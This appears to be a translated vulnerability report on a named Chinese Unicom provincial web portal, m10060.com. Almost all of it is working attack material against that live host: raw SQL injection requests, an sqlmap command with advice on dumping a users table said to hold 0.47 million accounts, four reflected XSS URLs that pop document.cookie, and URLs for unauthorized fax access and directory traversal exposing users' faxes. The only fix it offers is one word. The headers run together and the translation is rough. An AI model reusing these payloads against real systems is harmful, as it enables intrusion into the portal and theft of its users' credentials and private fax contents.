A Chinese Unicom provincial company SQL + XSS + unauthorized + path + Traversal

A Chinese Unicom provincial company SQL + XSS + unauthorized + path + Traversal

A Chinese Unicom provincial company has multiple SQL + Multiple XSS + unauthorized Fax + path leakage + fax content traversal, resulting in 0.47 million user name and password Leakage

 

China Union Network Communication Co., Ltd. Jilin Branch

Www.m10060.com

SQL first:

First
 

GET /common/phone/mailManger/sms_note/notesearch_submit_other.jsp?sclasses=1 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.m10060.com:80/Cookie: JSESSIONID=aE4bZsdZB15hHost: www.m10060.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0Accept: */*

Second:
 

GET /common/phone/msgmanger/msgTypeDetail.jsp?sclasses=1 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.m10060.com:80/Cookie: JSESSIONID=aE4bZsdZB15hHost: www.m10060.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0Accept: */*

Third:
 

POST /common/login_submit.jsp HTTP/1.1Content-Length: 171Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.m10060.com:80/Cookie: JSESSIONID=aE4bZsdZB15hHost: www.m10060.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0Accept: */*doLogin=true&hostname=m10060.com&password=g00dPa%24%24w0rD&redirectStr=allframe.htm&Submit=%b8%f6%c8%cb%b5%c7%c2%bd&username=3PJ0TgNj

 

 

 

By the way, if you want to obtain the user data of the ymaildb table, you cannot follow-D -- tables first. Instead, you must directly-D-T -- columns. Otherwise, the column name cannot be found, or use -- SQL-shell: <read more than 0.47 million users>
 

[root@Hacker~]# Sqlmap -r C:\Users\Administrator\Desktop\Desktop\5.txt --dbms=mssql -D ymaildb -T users --columns

 

 

 

XSS:

First:
 

http://www.m10060.com//common/phone/sendfax/failerror.jsp?errorMessage=3--%3E%3CScRiPt%20%3Eprompt%28document.cookie%29%3C/ScRiPt%3E%3C!--

 

Second:
 

http://www.m10060.com/common/login.jsp?hostname=m10060.com&message=%25B5%25C7%25C2%25BC%25CA%25A7%25B0%25DC%25A3%25AC%25C7%25EB%25D4%25DA%25B8%25F6%25C8%25CB%25B5%25C7%25C2%25BD%25C8%25EB%25BF%25DA%25B5%25C7%25C2%25BD!_%3C/script%3E%3Cscript%3Eprompt%28document.cookie%29%3C/script%3E&username=lxkhuxia

 

Third:
 

http://www.m10060.com//login.jsp?hostname=m10060.com&message=%25B5%25C7%25C2%25BC%25CA%25A7%25B0%25DC%25A3%25AC%25C7%25EB%25D1%25E9%25D6%25A4%25C4%25E3%25B5%25C4%25CA%25E4%25C8%25EB%25B5%25C4%25D3%25C3%25BB%25A7%25C3%25FB%25BA%25CD%25C3%25DC%25C2%25EB%25CA%25C7%25B7%25F1%25D5%25FD%25C8%25B7.%25B5%25C7%25C2%25BC%25CA%25A7%25B0%25DC%2c%25D3%25C3%25BB%25A7%25B2%25BB%25B4%25E6%25D4%25DA_%3C/script%3E%3Cscript%3Eprompt%28document.cookie%29%3C/script%3E&username=arwxpoeo

 

Fourth:
 

http://www.m10060.com//login.jsp?username=jagfewcb&hostname=m10060.com_%3C/script%3E%3Cscript%3Eprompt%28983227%29%3C/script%3E&message=%B5%C7%C2%BC%CA%A7%B0%DC%A3%AC%C7%EB%D1%E9%D6%A4%C4%E3%B5%C4%CA%E4%C8%EB%B5%C4%D3%C3%BB%A7%C3%FB%BA%CD%C3%DC%C2%EB%CA%C7%B7%F1%D5%FD%C8%B7.%C3%BB%D3%D0%D5%E2%B8%F6%D3%F2,name:%20m10060.com_%3C/script%3E%3Cscript%3Eprompt%28document.cookie%29%3C/script%3E1

 

Unauthorized authorization + absolute server path leakage: the original fax function can only be used by login users
 

http://www.m10060.com//common/phone/sendfax/fax_new.jsphttp://www.m10060.com//common/phone/sendfax//txt//20141024120428.txt

Directory Traversal + User Fax content leakage: <accessible to any user>
 

http://www.m10060.com//common/phone/sendfax//txt/http://www.m10060.com//common/phone/sendfax//txt//20141024120428.txt

 

 

 

Solution:

Filter